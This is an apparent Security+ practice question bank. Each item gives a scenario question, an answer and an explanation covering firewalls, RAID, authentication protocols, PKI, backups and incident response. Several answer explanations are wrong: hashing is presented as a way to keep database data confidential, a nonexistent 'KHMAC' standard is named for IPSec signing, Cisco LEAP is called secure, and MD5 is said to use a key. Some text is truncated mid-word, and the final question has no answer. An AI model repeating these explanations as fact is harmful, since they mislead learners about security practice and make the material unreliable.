A security administrator analyzed the following logs: Host: 10.248.248.67 [02: 15: 11]Successful Login: 045 10.248.248.67:local [02: 15: 16]Unsuccessful Login: 067 208.159.67.23: RDP 10.248.248.67 [02: 15: 16]Unsuccessful Login: 072 208.159.67.23: RDP 10.248.248.67 [02: 15: 16]Unsuccessful Login: 058 208.159.67.23: RDP 10.248.248.67 [02: 15: 16]Unsuccessful Login: 094 208.159.67.23: RDP 10.248.248.67 What should the security administrator implement as a mitigation method against further attempts?

Hardening It appears that an external IP address (208.159.67.23) is attempting to connect remotely to the local computer (10.248.248.67), possibly using the Remote Desktop Connection program. The connections were unsuccessful, but hardening is required at the local system and at the firewall to ensure that this IP address cannot connect through to the local computer. Services should be analyzed and, if necessary, shut down at the local computer. Ports should be scanned and, if necessary, closed at the firewall.System log monitoring is incorrect because the logs are present, and they have been monitored and analyzed, resulting in the answer that additional hardening is necessary. An IDS (intrusion detection system) looks for attacks and will notify an administrator (and possibly shut down a firewall if necessary), but it is not working correctly at this point. To truly mitigate the problem, the IDS should be reconfigured and hardened, or an IPS (intrusion prevention system) should be implemented. Reporting, along with the logs, seems to be working properly.

Robert has been asked to make sure that a server is highly available. He must ensure that hard drive failure will not affect the server. Which of the following methods allows for this?

Hardware RAID 5 Software RAID 1 RAID 1 (mirroring) and RAID 5 (striping with parity) are both fault-tolerant methods that will allow for high availability and ensure that hard drive failure will not affect the server.True clustering is when multiple computers' resources are used together to create a faster, more efficient system; it often uses load balancing to accomplish this. However, true clustering does not necessarily allow for fault tolerance of data. RAID 0 (striping) is not fault tolerant because there is no parity information.

The security administrator has added the following information to a SOHO router: PERMIT 00:1C:C0:A2:56:18DENY 01:23:6D:A9:55:EC Now, a mobile device user reports a problem connecting to the network. What is preventing the user from connecting?

Hardware address filtering has been implemented. The security administrator denied one MAC address at the SOHO router: 01:23:6D:A9:55:EC. This is most likely the MAC address of the mobile device that cannot connect to the network. Individual octets of a MAC address are often separated by colons when working in a router. However, in an operating system such as Windows they are often separated by hyphens. Be able to identify both. Note that the admin also permitted (or allowed) a particular MAC address to connect to the network. Access control lists (ACLs), or rules, such as these are created on the router to allow or disallow access. Port filtering could mean physical ports or logical TCP/IP ports such as port 80 HTTP. IP address filtering means that entire IP addresses (such as 10.254.254.101) have been filtered out. Both of these answers are incorrect because this scenario clearly deals with MAC addresses. WPA2-PSK is a method of connecting, but the "PSK" portion implies that it does not require a supplicant the way a technology such as 802.1X does. PSK means pre-shared key, a key that the admin selects and inputs into the router, which the user must know in order to connect to a wireless network.

Which of the following best describes a TPM?

Hardware chip that stores keys A TPM (trusted platform module) is a chip that resides on a motherboard that stores encrypted keys used to encrypt the entire hard drive of a computer. A hardware security module (HSM) is an example of a high-speed secure removable storage device. An example of a third-party certificate authority (CA) is a company such as VeriSign that develops and distributes trusted certificates. USB encryption is a removable type of encryption; for example, a USB flash drive might be encrypted with AES-256 to keep data secure.

You have been asked by your boss to protect the confidentiality of sensitive data entered into a database table. What is the quickest and easiest method to use?

Hashing Hashing is used in databases for indexing and file retrieval and is used to protect the confidentiality of data in database tables. It is faster and easier to use than encryption methods.Encryption is commonly used to protect the confidentiality of data files but is perhaps not the quickest and easiest method for information that is integral to database tables. Secure Copy (SCP) is used to securely transfer files between two computers. Biometrics is the science of identifying humans from their physical characteristi

Your organization has decided to move large sets of sensitive data to a SaaS cloud provider in order to limit storage and infrastructure costs. Your CIO requires that both the cloud provider and your organization have a clear understanding of the security controls that will be implemented to protect the sensitive data. What kind of agreement is this?

ISA An ISA is an interconnection security agreement. It is an agreement that is established between two (or more) organizations that own and operate connected IT systems and data sets. Its purpose is to specifically document the technical and security requirements of the interconnection between the organizations. This is the type of agreement you need in this scenario because the data is sensitive and the CIO requires that there is a clear understanding of security controls to be implemented and agreed upon. An SLA (service level agreement) is a contract between a service provider and a customer that specifies the nature of the service to be provided and the level of service that the provider will offer to the customer. It can be a very basic agreement, or it could also state the technical and performance parameters, but it will probably not include any specific security controls. An MoU is not an agreement at all, but a memorandum of understanding between two organizations or government agencies. It does not specify any security controls either. A BPA (business partners agreement) is a type of contract that can establish the profits each partner will get, what responsibilities each partner will have, and exit strategies for partners. Note that you might see the acronym BPA used for other things as well in the business and IT worlds.

Which process allows you to deploy, configure, and manage data centers through scripts?

IaC Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for secure DevOps. Security Development Operations (DevOps) means that security is built into all your development operations. Answer A is incorrect. Baselining allows you to know how software (or hardware, for that matter) performs under normal load situations. That behavior is known as metrics. When you add new services, you are able to determine what effect those services have on system performance. Because baselining is passive, it would not allow you to configure or manage data centers.Answer D is incorrect. When comparing waterfall to the agile development life-cycle model, waterfall uses tightly defined processes that are executed in a linear sequence. Agile is a cyclical methodology where development phases are iterative and each cycle moves the project a little closer to the final product. Because these are project management models, neither would be appropriate for managing data centers on an ongoing basis through scripts. Answer C is incorrect. Immutable systems are those where the configuration is static and may not be changed. This would not be appropriate for a data center environment where configurations may change to address security concerns.Other secure application development issues include security automation and continuous integration.Security automation occurs with agile software development. When automated security is integrated into agile development, security can be implemented effectively with ease during product development, rather than retrofitting security to a completed product.Continuous integration merges updated source code from multiple developers into a shared repository on a regular basis. When code is checked in, it is automatically verified so that problems are detected early. Continuous integration often results in security issues not being discovered and resolved because the appropriate personnel do not review for security issues.

The helpdesk department for your organization reports that there are increased calls from clients reporting malware-infected computers. Which of the following steps of incident response is the most appropriate as a first response?

Identification The first response within the incident response that should be taken in this scenario is identification. The malware needs to be identified, the computers affected need to be identified, and so on. Identification is usually the first step of an organization's incident response process. An example of the main phases of incident response is as follows: Preparation Identification Containment Eradication Recovery Lessons learned (This list can vary from one organization to the next and from one standardization body to the next.)A pre-step to this list is preparation—being ready with tools, knowledge, and training before an incident occurs. Validation can occur during steps 5 through 7, depending on the type of validation. Follow-up can be considered part of the documenting and monitoring step.

Which option includes verifying appropriate access controls, authentication controls, input validation, and proper logging, among others?

Identifying a lack of security controls When you scan to identify lack of security controls, you are looking for the presence or absence of appropriate access controls, authentication controls, input validation, and proper logging, and other security considerations.Answers B, A, and D are incorrect. When you passively test security controls, you are performing a vulnerability scan to identify weakness, but not exploiting those weaknesses. Vulnerability scans do not usually test controls. Rather than test operating systems, devices, and other components of any known vulnerabilities that may exist. When you attempt to identify common misconfigurations, you are looking for things like a router that still has the default administrative password. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

During the recent development of a new application, the customer requested a change. You must implement this change according to the change control process. What is the first step you should implement?

Impact Assessment You should analyze the change request. The change control procedures ensure that all modifications are authorized, tested, and recorded. Therefore, these procedures serve the primary aim of auditing and review by the management. The necessary steps in a change control process are as follows: Change request initiation and Control: Request for changes should be standardized and subject to management review; and change requestor should be kept informed Impact Assessment: Make sure that all requests for change are assessed in a structured way for analyzing possible impacts Control and Documentation of Changes: A change log should be maintained that tells the date, person details who made changes and changes implemented; only authorized individual should be able to make changes; a process for rolling back to the previous version should be identified Documentation and Procedures: Whenever system changes are implemented the procedures and associated document should update accordingly Authorized Maintenance: System access right should be controlled to avert unauthorized access Testing and User signoff: Software should be thoroughly tested Version Control: Control should be placed on production source code to make sure that only the latest version is updated Emergency Changes: A verbal authorization should be obtained, and the change should be documented as soon as possible A stringent change management process ensures that all the changes are implemented and recorded related to production systems, and enforces separation of duties. For instance, in a software development environment, changes made to production software programs are performed by operational staff rather than the software programmers, who are responsible for coding software applications for clients. Such a process ensures that the changes are implemented in the proper manner and the process is documented. Change management is about the decision to make the change.Configuration management is not the same as change management. Configuration management is about tracking the actual change. It is the discipline of identifying the components of a continually evolving system for the purposes of controlling changes to those components and maintaining integrity and traceability throughout the life cycle. Configuration management controls the changes that take place in hardware, software, and operating systems by assuring that only the proposed and approved system changes are implemented. In configuration management, a configuration item is a component whose state is to be recorded and against which changes are to be progressed. In configuration management, a software library is a controlled area accessible only to approved users who are restricted to the use of an approved procedure. Configuration control is controlling changes to the configuration items and issuing versions of configuration items from the software library. Configuration management includes configuration control, configuration status accounting, and configuration audit.Version control is associated with change management. When changes are implemented in an application, developers need to ensure that proper version control procedures are followed. In most organizations, there will be version control procedures for both minor and major changes. Maintaining proper version control will help ensure that the appropriate version is deployed on systems.

Which of the following will stop network traffic when the traffic is not identified in the firewall ruleset?

Implicit deny The principle of implicit deny is used to deny all traffic that isn't explicitly (or specifically) allowed or denied. In other words, if the type of traffic hasn't been associated with a rule, the implicit deny rule will kick in, thus protecting the device. Access control lists are used to filter packets and will include rules such as permit any or explicit denies to particular IP addresses.

While developing an incident response plan for your client, you outline the roles and responsibilities of a cyber response team. You also describe the establishment and formation of that team. What time frame should you specify for the formation of a cyber-incident response team?

In advance of an incident occurring Members of a cyber-incident response teams should be designated well in advance of an incident occurring. The members should be selected based on their particular area of expertise. The teams should practice responses to various security incidents. The cyber-incident response team is an important part of the incident response plan. The incident response plan should include the roles and responsibilities of the members of the incident response team. Each role and responsibility should be clearly defined. For examples, first responders should be responsible for securing the scene to preserve evidence. Incident handlers should gather evidence, secure or seize equipment, and document the scene. A designated spokesperson should be the point of contact for the media, and deliver the appropriate message on behalf of the company.You would not specify that a cyber-incident response team be formed when enough qualified individuals are available or only in response to an incident that has occurred.An incident response plan should also include reporting requirements and escalation guidelines. The reporting requirements would indicate how incidents are reported, what documentation is required, and what outside agencies (if any) should be notified. Escalation guidelines would indicate under what circumstances you need to ask for additional assistance. When an incident response plan is put into action, the final outcome should be a documented incident. Among the factors to include would be what happened, who responded, what the damage was, what type of incident occurred, and what escalation was taken.An exercise requirement should be included in an incident response plan. By using a mock incident as an exercise or drill, this would allow for training and evaluation of the effectiveness of a response or containment activity.An incident response plan should outline the incident types and category definitions. These definitions help dictate how the incident is handled, what actions the incident response team should take, and data collection and evidence gathering. For example, an incident response plan should define incident types that would be handled internally and incident types that should be turned over to law enforcement. You would also categorize the incident types by severity of impact, with each category having clearly defined response times, which resources would be assigned to the incident, and what should be done to prepare for the possibility of that incident.

You are analyzing why the incident response team of your organization could not identify a recent incident that occurred. Review the e-mail below and then answer the question that follows.E-mail from the incident response team:A copyright infringement alert was triggered by IP address 11.128.50.1 at 02: 30: 01 GMT.After reviewing the following logs for IP address 11.128.50.1, we cannot correlate and identify the incident. - 02: 25: 23 11.128.50.1 http://externalsite.com/login.asp?user=steve- 02: 30: 15 11.128.50.1 http://externalsite.com/login.asp?user=amy- 03: 30: 01 11.128.50.1 http://externalsite.com/access.asp?file=movie.mov- 03: 31: 08 11.128.50.1 http://externalsite.com/download.asp?movie.mov=ok

Incident time offsets were not accounted for. In this scenario, the copyright infringement alert was triggered at 02: 30: 01 GMT. This means that it happened at 2:30 AM (during the first second) and that the incident, and the logs, are based on GMT (Greenwich Mean Time), the global time standard. Note the third log shows that a movie file was accessed at 03: 30: 01. There is exactly a one-hour difference between the copyright infringement alert and the log file that shows the file access that occurred (which is the infringement). This could be due to the fact that the server hosting the file has its time based on a different time zone. There are several other possibilities why the incident time offset occurred, but it did occur. When scanning for incident time offsets (because your log files will probably be large), look for incidents that happened during the same minute and second, but on a different hour. Ultimately, what you (and the incident response team) need to find out is who downloaded the movie and triggered the copyright infringement. It could be that Amy was the downloader, based on the time offset, but you would need to analyze the situation further to be sure. The logs are certainly not corrupt, and they are definitely available, because the incident response team was able to access them and send them (or a copy of them) to you to review. You don't know if the chain of custody was properly maintained. It is beyond your understanding because the incident response team has the log files. You only received a copy of some of the log file information.

Which of the following techniques supports availability when considering a vendor-specific vulnerability in critical industrial control systems?

Incorporating diversity into redundant design The key word in the question is availability. One of the best ways to encourage availability is to have redundancy. The more diverse the redundancy, the more fault tolerant the system. Some industrial control systems do not have the option to run AV software, but even if they did, AV software does not promote availability directly. It helps to secure from viruses and other malware, but it is not a method of fault tolerance. Multiple firewalls, for example a back-to-back perimeter configuration, will help to block network-based attacks, but also do not increase availability. Application whitelists, if not configured properly, could actually reduce availability. They are meant to restrict users to specific allowed applications.

Your organization has suffered from several data leaks as a result of social engineering attacks that were conducted over the phone. Your boss wants to reduce the risk of another leak by incorporating user training. Which of the following is the best method for reducing data leaks?

Information security awareness Information security awareness means training users on how to: screen calls and e-mails; not to give out personally identifiable information (PII); not to share confidential organizational data; and in general, to protect data and PII. This will be the best method for reducing the chances of another data leak due to social engineering attacks. By the way, if the social engineering attacks were conducted by phone, the attack type is known as vishing, a form of phishing. The use of social media and the option to bring your own device (BYOD) often lead to increased social engineering (in the form of spim, phishing, and possibly pharming), and additional security is required to meet that threat. When it comes to BYOD, the main security concern is that there is a lack of controls in place to ensure that the devices have the latest system patches and signature files. Mobile device management (MDM) systems can alleviate that situation. Acceptable use is usually stated in policy form, and basically describes what people are allowed to do with company-owned computers and data. Though adherence to this policy can potentially help to reduce data leaks, it is not the best or most effective solution. Note: This is an example of a question for which two answers could arguably be correct. When taking the CompTIA Security+ exam, be sure to analyze the question carefully and select the best answer for most situations. Data handling and disposal is also important, but training in them won't reduce the type of social engineering attack in the question that was perpetrated on the organization; that attack was vishing. However, data handling policies can help with shoulder surfing, dumpster diving, and a variety of other attacks.

A security auditing consultant has completed a security assessment and gives the following recommendations: Implement fencing and additional lighting around the perimeter of the building. Digitally sign new releases of software. Categorically, what is the security consultant recommending? (Select the two best answers.)

Integrity Safety The fencing and additional lighting are for employee safety, especially at night. Digitally signing software, or anything else, speaks to keeping the integrity of the software intact. Hashing is another concept that could be implemented. Encryption would infer confidentiality. If the security consultant were to say that data is not secure in transit or at rest, then encryption would be a viable option. Fault tolerance infers availability. If the security consultant were to say that there are too many single points of failure, then fault-tolerant methods such as a redundant array of inexpensive [or independent] disks (RAID) array would be worth considering.

What does an incremental backup do?

It backs up all new files and any files that have changed since the last full or incremental backup, and resets the archive bit. An incremental backup backs up all new files and files that have changed since the last full or incremental backup, and also resets the archive bit. When restoring the data, the full backup must be restored first, followed by each incremental backup in order. Incremental backups build on each other; for example, the second incremental backup contains all of the changes made since the first incremental backup.A full backup backs up all files every time it runs. Because of the amount of data that is backed up, full backups can take a long time to complete. A full backup is used as the baseline for any backup strategy and most appropriate when using offsite archiving.A compressed full backup backs up all files in compressed format.A differential backup backs up all new files and files that have changed since the last full backup without resetting the archive bit. When restoring the data, the full backup must be restored first, followed by the most recent differential backup. Differential backups are not dependent on each other. For example, each differential backup contains the changes made since the last full backup. Therefore, differential backups can take a significantly longer time than incremental backups.A continuous backup system is one that performs backups on a regular basis to ensure that data can be restored to a particular point-in-time. SQL Server is an application that provides this feature. If a continuous backup plan is not used, any data changes that occurred since the last backup must be recreated after the restore is completed.Working copies are used to store data that consists of partial or full backups that are stored at the computer center for immediate recovery purposes, if necessary.

Which of the following statements is true about a certificate revocation list?

It should be kept public. Certificate revocation lists (CRLs) should be published regularly so that users know whether an issuer's certificate is valid. If the CRL were secret, it would defy its purpose. The CRL is not usually encrypted but will be digitally signed by the certificate authority (CA). The CRL does not sign keys; instead, the CA takes care of this.

In a scenario where data integrity is crucial to the organization, which of the following is true about input validation regarding client/server applications?

It should be performed on the server side. The best answer is that it should be performed on the server side. Given the choice between server-side and client-side input validation, server-side wins out. However, both should be incorporated as secure coding methods. Using the client side only can actually create additional vulnerabilities at the server. As a programmer, you don't really care about the user's knowledge level; you have to assume that smart users or attackers will come along at some point and try to hack your forms, web pages, or other applications, and design the client and server sides of the application appropriately. Even SSL-protected pages can be hacked into if they weren't properly validated. In fact, SSL doesn't really have too much effect on the matter, especially when it comes to web forms built in PHP or other similar web programming languages.

You review the system logs for your organization's firewall and see that an implicit deny is within the ACL. Which is an example of an implicit deny?

Items not specifically given access are denied by default. If a user or group of users does not have permissions to gain access to a resource, many systems will deny access by default; this is known as implicit deny and is common in firewalls and Windows operating systems. Default access control lists, or ACLs, will be set up for implicit deny and remain that way unless they are changed. ACLs are not a secure way of moving traffic, but rather they are a secure way of permitting or denying traffic to pass through a firewall or permitting or denying a user or group of users access to resources. Implicit deny does not deny all traffic, only traffic that has not been previously allowed.

You need to digitally sign packets that are transmitted on IPSec connections for your organization's VPN. Which of the following should you implement?

KHMAC Keyed Hashing for Message Authentication Code (KHMAC) is used to digitally sign packets that are transmitted on Internet Protocol Security (IPSec) connections. The standard is also referred to as Keyed-Hash Message Authentication Code (KHMAC).Answers D, A, and B are incorrect. Data Encryption Standard (DES) is a private key encryption standard that is used in IPSec to ensure that data packets are confidentially transmitted. Diffie-Hellman facilitates encryption key sharing. Internet Security Association and Key Management Protocol (ISAKMP) supports the establishment of security associations (SAs), which are sets of parameters that define the methods used by computers to communicate securely.

Which technologies provide single sign-on authentication?

Kerberos SESAME AD Kerberos, SESAME, and Active Directory are three technologies that provide single sign-on authentication. Novell eDirectory is another example. Single sign-on addresses the problem of users having to remember multiple usernames and passwords to access different systems. It involves centrally authenticating multiple systems against a federated user database.Answers E, F, and G are incorrect. Discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC) are three access control models that help companies design their access control structure. While they work with authentication technologies, they do not provide single sign-on authentication by themselves.Answer A is incorrect. Remote Authentication Dial-In User Service (RADIUS) is a dial-up and virtual private network (VPN) user authentication protocol used to authenticate remote users. It provides centralized authentication and accounting features. Alone, it does not provide single sign-on authentication. RADIUS only encrypts password packets from the client to the server.Single sign-on provides many advantages. It is an efficient logon method because users only have to remember one password and only need to log on once. Resources are accessed faster because users do not need to log in for each resource access. It lowers security administration costs because only one account exists for each user. It lowers setup costs because only one account needs to be created for each user. Single sign-on allows the use of stronger passwords. Other technologies that provide single sign-on authentication are security domains, directory services, and thin clients.

Your company has recently decided to implement a Kerberos environment for user authentication. What is the most important component in a Kerberos environment?

Key Distribution Center (KDC) The Key Distribution Center (KDC) is the most important component in a Kerberos environment. It is responsible for managing all of the secret keys, authenticating all users, and issuing tickets to valid users.Kerberos authentication requires a centralized management database of all user accounts and resource passwords.None of the other components listed is as important as the KDC.Principals are the entities to which the KDC provides services. They may be users, applications, or services.Session keys are symmetric keys used to encrypt and decrypt information that passed between the principals and the KDC.A ticket-granting ticket (TGT) is the entity issued by the authentication service (AS) on the KDC to a principal. The TGT proves principal identity throughout the communication process.

During a software development review, the cryptographic engineer advises the project manager that security can be improved by significantly slowing down the runtime of the hashing algorithm and increasing entropy by passing the input and salt back during each iteration. Which of the following best describes what the engineer is trying to achieve?

Key stretching

Which of the following is a secure wireless authentication method that uses a RADIUS server for the authenticating?

LEAP LEAP (Lightweight Extensible Authentication Protocol) is Cisco's version of EAP. It allows for dynamic Wired Equivalent Privacy (WEP) keys and mutual authentication with a RADIUS server. The other answers do not use a RADIUS server; they all rely on the pre-shared key (PSK). Counter Mode CBC-MAC Protocol (CCMP) is a secure alternative to Temporal Key Integrity Protocol (TKIP), both of which are used with a protocol such as WPA or WPA2. Both WEP-PSK and WPA2-PSK use pre-shared keys (PSK) that the administrator enters locally at the WAP. However, WEP should not be used in this manner, as it is deprecated. It can, however, be used in conjunction with a RADIUS server. In that scenario, it is possible to use WEP in a secure fashion.

What preserves the existence and integrity of relevant electronic records (and paper records) when litigation is imminent?

Legal hold Legal hold is the term for the preservation of information relevant to an impending lawsuit. Personnel will be instructed not to destroy or alter information relating to the topic of the lawsuit. Answer A is incorrect. Chain of custody deals with how the evidence is handled once it has been collected, and guarantees the identity and integrity of the evidence from the collection stage to its presentation in the court of law. There should be a log of who has had custody of the evidence, where it has been, and who has seen it. Active logging should also be used to document access to the evidence, including photographic or video records, showing the manner in which, the evidence is secured. Preserving data for a legal hold just ensures that data is retained for the appropriate period and has nothing to do with chain of custody, although chain of custody is vital to preserving evidence.Answer D is incorrect. An incident response plan describes how to respond to various types of security incidents. Incident response plans provides details on how to preserve data and logs related to an incident. Answer C is incorrect. Data sovereignty means that the data is subject to the laws of the location where it is stored. Different countries may differ in their laws for preserving the existence and integrity of records prior to litigation.

As part of the incident response team, you have been called in to help with an attack on your company's web server. You are currently working to identify the root cause of the attack. During which step of incident response does root cause analysis occur?

Lessons Learned You should perform root cause analysis during the review and close step. This is the final step in incident response.There are six steps in incident response: Preparation - Ensure that the organization is ready for an incident by documenting and adopting formal incident response procedures. Identification - Analyze events to identify an incident or data breach. If the first responder is not the person responsible for detecting the incident, the person who detects the incident should notify the first responder. This step is also often referred to as detection. Containment - Stop the incident as it occurs and preserve all evidence. Notify personnel of the incident. Escalate the incident if necessary. Containing the incident involves isolating the system or device by either quarantine or device removal. This step also involves ensuring that data loss is minimized by using the appropriate data and loss control procedures. Eradication - Fix the system or device that is affected by the incident. Formal recovery/reconstitution procedures should be documented and followed during this step of incident response. This step is also referred to as remediation Recovery - Ensure that the system or device is repaired. Return the system or device to production. This step is also referred to as resolution. Lessons Learned - Perform a root cause analysis, and document any lessons learned. Report the incident resolution to the appropriate personnel. This step may also be referred to as review and close. During the preparation step of incident response, you may identify incidents that you can prevent or mitigate. Taking the appropriate prevention or mitigation steps is vital to ensure that your organization will not waste valuable time and resources on the incident later.

Which of the following would an antivirus program most likely not detect?

Logic Bomb Pharming Antivirus programs are meant to scan for viruses, worms, and Trojans. They are least likely to discover logic bombs because logic bombs don't manifest themselves right away. Pharming is a type of social engineering attack that antivirus programs are not designed to detect.

Which of the following is vulnerable to spoofing?

MAC filtering When MAC filtering is enabled on a WAP, it actually broadcasts information wirelessly. This makes it vulnerable to spoofing. Because MAC filtering and a disabled SSID can be easily circumvented using a network sniffer, it is very important to also use strong encryption, and possibly consider other types of network access control (such as 802.1X) and external authentication methods (such as RADIUS).WPA-LEAP and WPA-PEAP are authentication protocols designed specifically to counter spoofing and other attacks. If the SSID is enabled, there is no need to do any spoofing because the SSID can be easily scanned for by war-drivers and other attackers.

Your organization has a policy that states that user passwords must be at least 16 characters. Your computers use NTLM2 authentication for clients. Which of the following hash algorithms will be used for password authentication?

MD5 The MD5 hashing algorithm is used by NTLM2 authentication. MD5 stands for Message-Digest algorithm 5. It uses a 128-bit key and is a widely used hashing algorithm. LM hash is used with passwords of 14 or fewer characters. If you use a password of 15 characters or more on newer versions of Windows, the OS will store a constant string as the LM hash, which is effectively a null password, and thereby uncrackable. The real password will be stored as an NTLM2 hash and (in this case calculated with MD5) will be used solely. AES is the Advanced Encryption Standard, used widely in wireless networks. SHA is the Secure Hash Algorithm, SHA-1 employs a 160-bit hash that is deprecated. Newer versions of SHA are more secure than MD5.

When authenticating with PEAP, what is used to provide mutual authentication between peer computers?

MSCHAPv2 PEAP uses MSCHAPv2 most commonly. This supports authentication via Microsoft Active Directory databases. MSCHAPv1 does not allow this and is not used in PEAP. MD5 is not an authentication method and is not used by PEAP. However, MD5 is used in EAP-MD5 (as a hashing algorithm), which is also challenge-based. PEAP is a derivative of EAP (Extensible Authentication Protocol).

You are designing the environmental controls for a server room that contains several servers and other network devices. What roles will an HVAC system play in this environment? (Select the two best answers.)

Maintain appropriate humidity levels Provide an appropriate ambient temperature The HVAC system's primary responsibilities are to provide an appropriate ambient temperature for the equipment and to maintain appropriate humidity levels. This keeps the equipment from overheating and prevents electrostatic discharge (ESD). HVAC equipment cannot shield other equipment from EMI. However, some HVAC equipment needs to be shielded to reduce EMI after it is installed. Isolation can be provided by other methods such as the material used in the perimeter of the room (for example, physical firewalls). A separate ventilation system can be installed to vent fumes away from the server room; however, there shouldn't be any fumes. Products that contain fumes should be stored in a separate and specially secured area. And if a fire were to occur, the sprinkler system or special hazards system should end that threat, eliminating any fumes that were a result of the fire.

Your boss speculates that an employee in a sensitive position is committing fraud. What is the best way to identify if this is true?

Mandatory vacations Mandatory vacations should be implemented to help detect (and possibly stop) fraud, sabotage, or other malicious activity on the part of a person working in a sensitive position in an organization. Separation of duties (and job rotation) is employed when more than one person is utilized to complete a task. Although this might be a way to identify fraud, it does not take into account the possibility that one user is still committing fraud without the other user(s) noticing. It also doesn't take into account the chance that all users involved in the job rotation system could be committing fraud together. Mandatory vacations are a better method of detecting ongoing fraud. Due diligence ensures that IT risks are known and managed. Acceptable usage policies define the rules that restrict how a system may be used.

You are in the middle of the information gathering stage of the planning and deployment of a role-based access control model. Which of the following is most likely required?

Matrix of job titles with required privileges The information gathering stage of a task such as this requires a matrix of job titles and required privileges, preferably something in spreadsheet format that can easily be entered into the system quickly. Each employee in the matrix would fall into a specific role in the RBAC model. The important information here for the RBAC model is the names of employees, job titles, and their required privileges. The clearance levels are also important, but they should be translated into required privileges before they are sent to the security administrator planning the RBAC model. Rules under which certain systems can be accessed aren't required here; besides, that would be an example of rule-based access control, not role-based access control. Any group-based privileges already in place will most likely be wiped clean once the new RBAC system is up and running, so they probably aren't necessary either.

Rick is reviewing the logs of a host-based IDS. They show that the computer has been compromised by a botnet and is communicating with a master server. If Rick needs to power the computer off, which of the following types of data will be unavailable?

Memory, system processes, and network processes Memory is cleared when the computer is shut down (unless hibernation mode has been implemented). This removes system and network processes from memory. Archival storage, the master boot record, system disk, e-mail, and log files will still be available. Although two other answers had possibilities within them, they weren't altogether correct.

Which of the following is the greatest security risk of two or more companies working together under a memorandum of understanding?

MoUs are generally loose agreements that do not have strict guidelines governing the transmission of sensitive data. An MoU is generally a loose agreement. It differs from a service level agreement (SLA) and an interconnection security agreement (ISA) in that those are very specific regarding legal issues and security concerns.It could be said that an MoU between two parties cannot be held to the same legal standards as an SLA. However, that is a legal risk and not a security risk. Because the MoU may not have budgetary considerations written carefully, an entity may be left to absorb unexpected cost, but this is a financial risk, not a security risk. MoUs do not generally have strict policies concerning services performed between entities. The name implies a lot: memorandum of understanding. It is an understanding that has been met, not an agreement.

The IT director asks you to create a solution to protect your network from Internet-based attacks. The solution should include pre-admission security checks and automated remediation and should also integrate with existing network infrastructure devices. Which of the following solutions should you implement?

NAC NAC, or network access control, makes security checks of the users or the actual connections that are made before sessions are initiated. It can also remediate issues automatically if configured properly. 802.1X is an example of network access control. NAT (network address translation) converts one set of IP addresses to another. VLAN is a virtual local area network. Subnetting compartmentalizes IP networks by way of IP addresses and mathematics.

You install a network device that acts as the interface between a local area network and the Internet using one IP address. Which device did you install?

NAT router A Network Address Translation (NAT) router acts as the interface between a local area network and the Internet using one IP address.Answer C is incorrect. A VPN is a private network that is implemented over a public network, such as the Internet.Answer B is incorrect. A switch is a computer networking device that connects devices together on a computer network by using packet switching to receive, process, and forward data to the destination device.Answer A is incorrect. A firewall is a device that protects a network from unauthorized access by allowing only certain traffic to pass through it. While a firewall can also be a router, it is referred to as a firewall when its purpose is to create a DMZ.

Which of the following would you most likely find in a buffer overflow attack?

NOP instructions A large number of No Operation instructions (known as NOP or no-op instructions) can be used to overflow a buffer, which could allow unwanted code to be executed or result in a denial of service (DoS). Large numbers of NOP instructions can be used to perform a NOP slide (or NO-OP sled). Sequence numbers are how TCP packets are numbered. IV length has to do with the length of a string in a cipher. Flags are one or more bits that are set to a binary number to indicate whether something is on or off.

It has been quite some time since you have updated the network documentation for your company's CAT7 network. You want to scan the network with a tool like Solar Winds or LanHelper. In addition to finding new equipment that may have been added but not documented, what are other areas in which you can focus using these tools? (Choose all that apply.)

Network mapping Rogue system detection In addition to finding new equipment that has not been added to the documentation, network scanning tools can detect rogue systems and map the network. Rogue systems may have been placed in the network by someone to bypass security measures or to intercept traffic through an unauthorized wireless access point. Network mapping is the process or using a network scanner to produce a map of the logical or physical topology of the network. This map would be incorporated into the network documentation. Answers B and C are incorrect. While tools like Solar Winds and LanHelper can also scan wireless networks, there are other tools specifically designed for wireless scanning and cracking. Examples include Aircrak, pwdump, and Ophcrack. Vulnerability detection would identify weaknesses in the network, but would not assist you with finding new or undocumented equipment.

Which of the following would be an example of a design weakness?

Not including a DMZ Failure to build in a demilitarized zone (DMZ) is a perfect example of an architecture or network design weakness. Answer B is incorrect. System sprawl or undocumented assets are common with a growing network. As the network expands and becomes more complex, it becomes more difficult to document, as well to manage, the assets in the networks. However, it does not refer to a failure in the design of the network itself.Answer C is incorrect. New threats or zero day attacks are particularly damaging when an organization does not update its antivirus software. It may be a failure of the security policy, but it does not refer to a failure in the design of the network itself.Answer D is incorrect. Failing to store private keys, public keys, or certificates securely are examples of improper certificate and key management. Again, this is an issue with security policies and not with network architecture.

You are designing an application that will allow a user to log in to the application with the user's existing Facebook or Twitter credentials. Which service would you incorporate in the application?

OAuth OAuth is Open Authorization. The current standard, OAuth 2.0, grants an application limited access to a user's account on a third-party site, such as Facebook or Twitter. OAuth could grant the application access to a friend's list or give the application the ability to post on the user's behalf. OpenID Connect provides the authentication necessary in OAuth, but it is not the actual service that you use. It authenticates the user, and stores the user information in a token.Answers C, D, and A are incorrect. Shibboleth uses Security Assertion Markup Language (SAML), which defines security authorizations on web pages, as opposed to web page elements in HTML. Shibboleth is a single sign-on (SSO) system but does not allow the usage of Facebook or Twitter credentials.A secure token contains the user information and authentication information used by OpenID. It is not a service.

Which of the following is used to validate whether trust is in place and accurate by retuning responses of "good," "unknown," or "revoked"?

OCSP OCSP (Online Certificate Status Protocol) is used as a lightweight (albeit less secure) alternative to the CRL. It validates certificates by returning responses such as "good," "unknown," and "revoked." PKI stands for public key infrastructure, which OCSP is a part of. The PKI is the entire set of software, hardware, users, computers, certificates, and so on—it is an entire infrastructure. CRL stands for certificate revocation list, which is a list of certificates that are no longer valid. The RA is the registration authority, which is used to verify requests for certificates; it forwards the response to the CA.

You have found that your system for validating keys has a latency period of 24-48 hours. As a result, a key that had been breached was accepted. You want to provide a real-time solution that will reduce this latency period. Which technology should you implement?

